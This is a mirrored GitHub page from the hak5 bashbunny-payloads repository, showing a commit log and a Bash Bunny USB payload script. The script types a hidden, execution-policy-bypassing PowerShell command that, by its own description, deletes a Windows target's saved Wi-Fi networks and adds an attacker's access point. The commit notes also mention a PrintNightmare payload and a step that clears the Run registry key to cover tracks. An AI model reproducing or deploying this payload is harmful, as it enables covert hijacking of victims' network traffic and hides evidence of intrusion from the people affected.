mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* New Payload Added new PrintNightmare Payload (Quick and dirty) * Fixed my potty mouth I'm a child sometimes * Renamed Payload * PrintNightmare: Use SWITCH_POSITION in payload path * Fixing a typo * Added Delays Added some delays due to the fact that it was inconsistently reliable, occasionally it'd half type out the command. The delays have resolved the consistency issue on my end. Feel free to tweak as required. * Amending Version Number I'm a fool * Updated Readme with proper credit * Housekeeping Moved some of the QUACK Powershell commands into the juicybit.txt file for speed and ease of use. * Update README.md * More improvement Added exit to the juicybits rather than using alt and /noprofile to the run as * Update README.md * Pineapple-Connect-Windows New Payload For Connecting Client To Pineapple AP / Any AP Pineapple-Connect-Windows new Bashbunny payload for connecting target machine quickly and efficiently to your Pineapple AP or an AP of your choosing (and control!) * Changed from RUN WIN to QUACK STRING Changed from RUN WIN to QUACK STRING as I was having issues with the formatting, presume it needs wrapping in quotes or something but it just kept breaking. QUACK STRING works fine so meh * Added command to cover traks at the end of the script added a line of powershell to clean out the run registry key to hide any evidence of the script running Co-authored-by: Marc <foxtrot@malloc.me> Co-authored-by: Marc <foxtrot@realloc.me>
45 lines
1.2 KiB
Bash
45 lines
1.2 KiB
Bash
#!/bin/bash
|
|
# Title: Pineapple-Connect-Windows aka PanicAcid's Incog-neato WiFi Switcheroo'er
|
|
# Description: Deletes all saved wlans on a target machine and creates a new saved wlan with your desired SSID and PSK
|
|
# Think getting a client to connect to your Mk7's Evil WPA Access Point
|
|
# Inspired by thatguy.exe on the Hak5 Discord
|
|
# Author: PanicAcid
|
|
# Version: 1.0
|
|
# Category: General
|
|
# Target: Windows (Powershell)
|
|
# Attackmodes: HID, STORAGE
|
|
#
|
|
# Purple.............Loading
|
|
# Green .............Execute
|
|
# Off................Finished
|
|
|
|
|
|
|
|
# OPTIONS - More options available in the Powershell payload
|
|
OBFUSCATECMD="N" # Y=yes or N=no
|
|
|
|
#-----------------------------------
|
|
# Purple LED - initializing
|
|
LED SETUP
|
|
|
|
GET SWITCH_POSITION
|
|
DUCKY_LANG gb
|
|
# Attackmode HID / Storage
|
|
ATTACKMODE HID STORAGE
|
|
|
|
#-----------------------------------
|
|
# Green LED - executing
|
|
|
|
LED STAGE1
|
|
|
|
#Let's Go!
|
|
|
|
QUACK GUI r
|
|
QUACK DELAY 300
|
|
QUACK STRING Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\pconnect.ps1')"
|
|
QUACK ENTER
|
|
|
|
#-----------------------------------
|
|
# Kill the lights - finished
|
|
|
|
LED FINISH |